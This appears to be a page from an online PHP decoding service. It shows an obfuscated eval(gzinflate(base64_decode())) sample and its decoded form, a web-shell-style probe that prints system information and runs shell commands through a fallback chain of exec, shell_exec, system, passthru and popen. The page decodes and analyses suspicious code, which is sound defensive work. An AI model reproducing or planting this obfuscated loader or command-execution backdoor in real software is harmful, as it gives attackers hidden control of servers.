Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
eval(gzinflate(base64_decode('pZLfasMgFMbvB3sHK4UYyMo2drWuIw8yCNYcG4fR4FGWUvruU9M0uyj0Ynfh..
Decoded Output download
sohai<br>sys:Linux localhost 2.4.21-0.13mdk #1 Fri Mar 14 15:08:06 EST 2003 i686<br>echo "sohai<br>";
echo "sys:".php_uname()."<br>";
$cmd="echo reload-x,bogel,and rusuh";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("
",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
Did this file decode correctly?
Original Code
eval(gzinflate(base64_decode('pZLfasMgFMbvB3sHK4UYyMo2drWuIw8yCNYcG4fR4FGWUvruU9M0uyj0Ynfh+/P7DhIQnSUUbcfVx9590u3jA0zSEd/pZuiGJhjeAys3dA6sRd/uaI450Ja3T2O1twfQFTctcQFDl2OAcAgqhWFkqVTO9MWKigxGeGUNySkJ5Sl2HSDZkaKIvpKEraAf/HGyk68km2sNjAo9sgJGEEV26/SZw1UCpdkL8Nsqw+iXoVfjHE/SCLeA2IHWzYK9MOpFnw66Qzmih/5ymN036LnzLJXqybpCZn4MHcA3whoPJiJyNopg2kZo4IbdmRw4ou9cuDk6m/+erRU2sWqDE8DWMiEGO4CZHp46Wv59NZp+iZ9OaWCrWoKVsVKW5ESyv4ll6YC3Ua1enl/fyi05p2OFtpjoeToqDnxwJpeS8gs='))); die;
Function Calls
ex | 1 |
gzinflate | 1 |
php_uname | 1 |
base64_decode | 1 |
Stats
MD5 | 1f11c2a4d1d13fdf14ad832a0154bdbe |
Eval Count | 1 |
Decode Time | 96 ms |